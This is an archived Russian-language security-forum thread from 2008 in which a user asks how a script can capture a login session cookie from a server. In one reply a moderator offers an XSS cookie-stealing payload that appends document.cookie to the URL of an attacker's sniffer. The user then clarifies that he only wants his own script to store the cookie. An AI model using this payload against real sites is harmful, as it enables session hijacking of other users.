HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Снова о куке!!! При авторизации сервер ее дает, как сохр...
  #1  
Старый 06.07.2008, 15:10
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
Talking Снова о куке!!! При авторизации сервер ее дает, как сохр...

Снова вопрос о куке!
Есть сервер X, при авторизации он передает куку... так вот, какой скрипт может перехватить переданную им (сервером X) куку??
 
Ответить с цитированием

  #2  
Старый 06.07.2008, 15:12
Ильич
Banned
Регистрация: 05.07.2008
Сообщений: 16
Провел на форуме:
23890

Репутация: 8
По умолчанию

никакой
 
Ответить с цитированием

  #3  
Старый 06.07.2008, 15:27
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию

блин все так туманно расписанно- непойму ты XSS нашел а как ей воспользоваться незнаеш? я правильно понял?, ну для начала тебе снифер нужен ну а потом попробуй вставить что то наподобие (script)img=new Image();img.src="адрес твоего снифера"+document.cookie;(/script)
P.S. единственное замени ) на > ну и обратную скобку на < в словах script
 
Ответить с цитированием

  #4  
Старый 06.07.2008, 15:42
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

Да не)))

Я написал скрипт (назовем его My_script), который передает пост запрос с обязательной кукой, в которой содержится сессия. Эта сессия на 2 часа, далее идет логаут... сессия уже не действительна. Необходимо снова логинится и забивать в скрипт My_script данные куки... я хочу чтобы новую куку брал скрипт...
 
Ответить с цитированием

  #5  
Старый 06.07.2008, 15:46
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

post запрос с логин\паролем скрипту www.chuzoy_site.py/LOGIN.PHP ... он дает ответ, в котором кука... нужно ее сохранить
 
Ответить с цитированием

  #6  
Старый 06.07.2008, 16:01
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

используй /dev/head/
в гугле поищи...
хорошая вещь...
 
Ответить с цитированием

  #7  
Старый 06.07.2008, 16:16
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

Мм... -Hormold-, я не профи)) подробней бы
и у мну нет никса... одни окна... (на домашнем хочу..)
 
Ответить с цитированием

  #8  
Старый 06.07.2008, 16:19
Ильич
Banned
Регистрация: 05.07.2008
Сообщений: 16
Провел на форуме:
23890

Репутация: 8
По умолчанию

Цитата:
используй /dev/head/
Цитата:
и у мну нет никса...
 
Ответить с цитированием

  #9  
Старый 06.07.2008, 16:45
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

Ну так как?? Опять будете до последнего молчать??!?!?
 
Ответить с цитированием

  #10  
Старый 07.07.2008, 01:52
rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме:
644324

Репутация: 11
По умолчанию

Ну ответьте.. какой скрипт это может проделать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Raid, Scsi Cthulchu "Железо" 5 22.11.2008 16:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ